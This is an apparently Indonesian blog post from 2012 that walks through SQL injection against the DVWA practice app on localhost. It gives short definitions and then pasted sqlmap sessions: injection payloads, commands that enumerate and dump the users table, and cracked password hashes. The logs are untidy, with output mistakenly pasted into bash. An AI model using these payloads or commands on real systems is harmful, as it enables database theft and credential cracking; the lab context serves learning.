I'm Newbie !: DVWA SQL injection Hard Level

Defines:

SQL injection

SQL injection is a code injection technique that exploits a security vulnerability in a website's software.

Blind SQL injection

Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered.

Example :

SQL MAP

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: id=2' AND (SELECT 687 FROM(SELECT COUNT(*),CONCAT(CHAR(58,112,111,114,58),(SELECT (CASE WHEN (687=687) THEN 1 ELSE 0 END)),CHAR(58,112,116,98,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'XyFv'='XyFv&Submit=Submit

Type: UNION query

Title: MySQL UNION query (NULL) - 1 to 10 columns

Payload: id=2' UNION ALL SELECT CONCAT(CHAR(58,112,111,114,58),IFNULL(CAST(CHAR(88,111,67,99,88,86,76,121,85,120) AS CHAR),CHAR(32)),CHAR(58,112,116,98,58)), NULL# AND 'LtQG'='LtQG&Submit=Submit

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=2' AND SLEEP(5) AND 'wjcm'='wjcm&Submit=Submit

---

[21:59:36] [INFO] manual usage of GET payloads requires url encoding

[21:59:36] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL 5.0

[21:59:36] [INFO] fetching database names

[21:59:36] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': information_schema, dvwa, fbip, mysql

available databases [4]:

[*] dvwa

[*] fbip

[*] information_schema

[*] mysql

[21:59:36] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 21:59:36

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie=" security=low; PHPSESSID=8elfeon7glue479503e24on4t2" -D dvwa --tables

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 22:02:20

[22:02:20] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file

[22:02:20] [INFO] resuming injection data from session file

[22:02:20] [INFO] resuming back-end DBMS 'mysql 5.0' from session file

[22:02:20] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: id

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Type: UNION query

Title: MySQL UNION query (NULL) - 1 to 10 columns

Payload: id=2' UNION ALL SELECT CONCAT(CHAR(58,112,111,114,58),IFNULL(CAST(CHAR(88,111,67,99,88,86,76,121,85,120) AS CHAR),CHAR(32)),CHAR(58,112,116,98,58)), NULL# AND 'LtQG'='LtQG&Submit=Submit

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=2' AND SLEEP(5) AND 'wjcm'='wjcm&Submit=Submit

---

[22:02:20] [INFO] manual usage of GET payloads requires url encoding

[22:02:20] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL 5.0

[22:02:20] [INFO] fetching tables for database: dvwa

Database: dvwa

[2 tables]

+-----------+

| guestbook |

| users |

+-----------+

[22:02:20] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 22:02:20

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie=" security=low; PHPSESSID=8elfeon7glue479503e24on4t2" -D dvwa -t users --dump

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 22:03:15

[22:03:16] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file

[22:03:16] [INFO] resuming injection data from session file

[22:03:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file

[22:03:16] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: id

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Type: UNION query

Title: MySQL UNION query (NULL) - 1 to 10 columns

Payload: id=2' UNION ALL SELECT CONCAT(CHAR(58,112,111,114,58),IFNULL(CAST(CHAR(88,111,67,99,88,86,76,121,85,120) AS CHAR),CHAR(32)),CHAR(58,112,116,98,58)), NULL# AND 'LtQG'='LtQG&Submit=Submit

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: id=2' AND SLEEP(5) AND 'wjcm'='wjcm&Submit=Submit

---

[22:03:16] [INFO] manual usage of GET payloads requires url encoding

[22:03:16] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL 5.0

[22:03:16] [INFO] fetching tables for database: dvwa

[22:03:16] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': dvwa, guestbook, dvwa, users

[22:03:16] [INFO] fetching columns for table 'guestbook' on database 'dvwa'

[22:03:16] [INFO] fetching entries for table 'guestbook' on database 'dvwa'

Database: dvwa

Table: guestbook

[1 entry]

+-------------------------+------------+------+

| comment | comment_id | name |

+-------------------------+------------+------+

| This is a test comment. | 1 | test |

+-------------------------+------------+------+

[22:03:16] [INFO] Table 'dvwa.guestbook' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/guestbook.csv'

[22:03:16] [INFO] fetching columns for table 'users' on database 'dvwa'

[22:03:16] [INFO] fetching entries for table 'users' on database 'dvwa'

recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y

[22:03:25] [INFO] using hash method: 'md5_generic_passwd'

what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]

[22:03:31] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'

do you want to use common password suffixes? (slow!) [y/N] y

[22:03:34] [INFO] starting dictionary attack (md5_generic_passwd)

[22:03:34] [INFO] found: 'abc123' for user: 'gordonb'

[22:03:35] [INFO] found: 'charley' for user: '1337'

[22:03:35] [INFO] found: 'letmein' for user: 'pablo'

[22:03:36] [INFO] found: 'password' for user: 'admin'

Database: dvwa

Table: users

[5 entries]

+--------------------------------------------------+------------+-----------+---------------------------------------------+---------+---------+

+--------------------------------------------------+------------+-----------+---------------------------------------------+---------+---------+

| http://127.0.0.1/dvwa/hackable/users/1337.jpg | Hack | Me | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | 1337 | 3 |

+--------------------------------------------------+------------+-----------+---------------------------------------------+---------+---------+

[22:04:30] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv'

[22:04:30] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 22:04:30

root@bt:/pentest/database/sqlmap# root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="Cookie: security=low; PHPSESSID=8elfeon7glue479503e24on4t2" --dbs

bash: root@bt:/pentest/database/sqlmap#: No such file or directory

root@bt:/pentest/database/sqlmap#

root@bt:/pentest/database/sqlmap# sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool

bash: syntax error near unexpected token `r4009'

root@bt:/pentest/database/sqlmap# http://sqlmap.sourceforge.net

bash: http://sqlmap.sourceforge.net: No such file or directory

root@bt:/pentest/database/sqlmap#

root@bt:/pentest/database/sqlmap# [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

> [*] starting at: 21:59:33

> [21:59:33] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file

> [21:59:33] [INFO] resuming injection data from session file

> [21:59:33] [INFO] resuming back-end DBMS 'mysql 5.0' from session file

> [21:59:33] [INFO] testing connection to the target url

> you provided an HTTP Cookie header value. The target url provided its own Cookie within the HTTP Set-Cookie header. Do you want to continue using the HTTP Cookie values that you provided? [Y/n] y

> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

> ---

> Place: GET

> Parameter: id

> Type: error-based

I'm Newbie !

Rabu, 08 Februari 2012

DVWA SQL injection Hard Level

Tidak ada komentar:

Posting Komentar